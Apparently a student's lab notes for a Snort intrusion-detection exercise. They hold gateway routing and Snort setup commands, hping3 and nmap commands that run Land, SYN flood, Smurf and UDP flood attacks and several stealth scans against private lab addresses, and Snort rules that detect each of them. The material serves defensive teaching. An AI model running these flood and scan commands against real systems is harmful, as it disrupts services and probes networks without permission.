 # rules found in sudo gedit /etc/snort/rules/local.rules  
   
# setup routing on enp0s9
sudo iptables -t nat -A POSTROUTING -o enp0s9 -j MASQUERADE
   
    # Delete and re-add default gateway
route -n
sudo route del default gw 10.0.2.1 
sudo route add default gw 10.0.2.1 -i ens9 

# auto comments all includes
sudo sed -i 's/include \$RULE_PATH/#include \$RULE_PATH/' /etc/snort/snort.conf

# On Gateway Start alerting logs
sudo snort -A console -c /etc/snort/snort.conf -q -i enp0s8

# Task 4.1 Land Attack #

#Perform Land attack
sudo hping3 --syn 10.0.0.10 -p 80 -a 10.0.0.10 -s 80 --fast

# Task 4.2 SYN Flood Attack #

#SYN flood attack
sudo hping3 --syn 10.0.0.10 -p 80 --rand-source --fast

#
sudo hping3 --icmp 192.168.0.255 -a 10.0.0.10 -s 80 --fast

# Task 4.3 Smurf Attack #

#smurf attack
sudo hping3 --icmp 192.168.0.100 -a 10.0.0.10 -s 80 --fast

# Task 4.4 UDP Flood Attack #

#UDP flood attack
sudo hping3 --udp 10.0.0.10 -p 80 --rand-source --fast

# Task 4.5 Port Scanning #

#TCP ACK scan
sudo hping3 --ack 10.0.0.10 --flood

#TCP FIN scan
sudo hping3 --fin 10.0.0.10 --flood

#TCP Xmas scan
sudo hping3 -FPU 10.0.0.10 --flood

#Null scan
sudo nmap -sN 10.0.0.10

#UDP scan
sudo hping3 --udp 10.0.0.10 --flood



# Snort rules

# $Id: local.rules,v 1.11 2004/07/23 20:15:44 bmc Exp $
# ----------------
# LOCAL RULES
# ----------------
# This file intentionally does not come with signatures.  Put your local
# additions here.

# Land attack
alert tcp 10.0.0.10 80 -> 10.0.0.10 80 (msg: "Land attack"; flags: S;sid: 100000001; rev: 1;)

# SYN flood attack
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg: "SYN flood attack"; flags:s; threshold: type threshold, track by_dst, count 20, seconds 60;sid: 100000002; rev: 1;)

#Smurf Attack
alert icmp 192.168.0.100 any -> $HOME_NET any (msg: "Smurf attack";itype:0;sid: 100000003; rev: 1;)

# UDP flood attack
alert udp $EXTERNAL_NET any -> $HOME_NET 80 (msg: "UDP flood attack"; threshold: type threshold, track by_dst, count 10, seconds 60;sid:100000004; rev: 1;)

# TCP ACK scan
alert tcp $EXTERNAL_NET any -> 10.0.0.10 any (msg: "TCP ACK scan"; flags: A; threshold: type threshold, track by_dst, count 20, seconds 60;sid: 100000005; rev: 1;)

# TCP FIN scan
alert tcp $EXTERNAL_NET any -> 10.0.0.10 any (msg: "TCP FIN scan"; flags:F; threshold: type threshold, track by_dst, count 20, seconds 60;sid:100000006; rev: 1;)

#TCP Xmas scan
alert tcp $EXTERNAL_NET any -> 10.0.0.10 any (msg: "TCP Xmas scan"; flags:FPU; threshold: type threshold, track by_dst, count 20, seconds 60;sid: 100000007;rev: 1;)

# TCP Null scan
alert tcp $EXTERNAL_NET any -> 10.0.0.10 any (msg: "TCP Null scan"; flags:0; threshold: type threshold,track by_dst, count 20, seconds 60;sid: 100000008; rev: 1;)

# UDP scan
alert udp $EXTERNAL_NET any -> 10.0.0.10 any (msg: "UDP scan"; threshold: type threshold, track by_dst, count 20, seconds 60;sid:100000009; rev: 1;)
